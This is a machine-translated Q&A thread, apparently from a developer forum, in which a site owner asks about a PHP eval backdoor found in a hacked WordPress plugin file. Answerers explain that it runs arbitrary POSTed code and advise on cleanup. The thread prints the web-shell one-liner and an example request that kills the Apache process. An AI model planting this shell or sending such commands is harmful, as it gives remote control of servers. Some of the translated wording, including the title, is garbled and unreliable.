找到<；？php@eval（$#u POST['；pass'；]）&燃气轮机；wordpress站点中的代码

我在我的一个wordpress插件网站上找到了这段代码。

---

我猜它可能被恶意使用，但它到底是做什么的？我能找出它是否调用了我应该知道的其他操作吗？

是的，它非常糟糕。我无法想象这种代码作为无害软件的一部分存在的任何情况

这段代码基本上允许运行

pass

get参数给出的任何php代码。例如，将此php称为

http://yoursite/your.php?pass=system（“killall-9阿帕奇”）将关闭您的Web服务器。但它可用于任何用途（包括覆盖/扩展现有脚本以将站点密码保存在临时文件中，以及稍后获取此临时文件）

这可能是一个后门，而且可能不是唯一的一个。您的站点需要进行深入的安全检查。
此PHP脚本属于中国斩波黑客工具包

我需要一些周边代码。插件做什么？恶意意图也是我的第一个猜测。这是一个受信任的插件WP Migrate DB，但该网站被黑客攻击，我正在尝试清理所有剩余的内容。我不确定你是否可以在不查看所有其他相关代码的情况下判断这是否是黑客攻击，如果你的网站被黑客攻击，可能是任何wordpress文件。我会重新安装WP和所有来自可靠来源的插件。或者，你也可以试着注释掉那一行，看看是否有什么东西断了：）我忘了提到，那是该文件中唯一的代码。文件名为functions.php，因此我猜在插件目录中越深，删除就越安全。这似乎意味着在某处有另一个文件调用functions.php并使用它获取您的密码，而不明显它正在处理您的密码。我会给这个文件99%的机会成为黑客的一部分。我会删除你所有的插件，并至少重新安装它们。我关闭了网站，并将进行反病毒和反恶意软件扫描。有没有一个可能的恶意代码列表，我可以尝试在文件中搜索吗？实际上，Peter，知道这段代码是用来将站点密码写入文件的，我们如何找到该文件所在的位置以及攻击者查看/下载该文件的方式？@Jessica217-实际上，你不知道该代码的作用，攻击者可以发送POST请求，并可以在“通过”字段中输入他想要的任何内容。他将输入他想要执行的脚本，而不是密码。好的，谢谢。我可以扫描一个网站的“通行证”字段，然后慢慢地看每个字段都做了什么吗？@Jessica217你可以这样做，但这对你目前的问题不会有很大帮助。“pass”作为变量名，很可能在“passthrough”或“password”上下文中使用。在您当前的上下文中，它被用作“pass”，因为名为
$codeToRunInBackdoor
的变量可能有点浮华。很抱歉，现在知道了这一点，您如何在服务器上查找它，因为只搜索密码或pass会得到许多结果？另一个选项是使用Reg-Ex。。类似这样的内容：/可能是一篇短文，但它是一篇优秀的文章-谢谢-如果您受到了影响，请不要错过删除数据库条目的机会。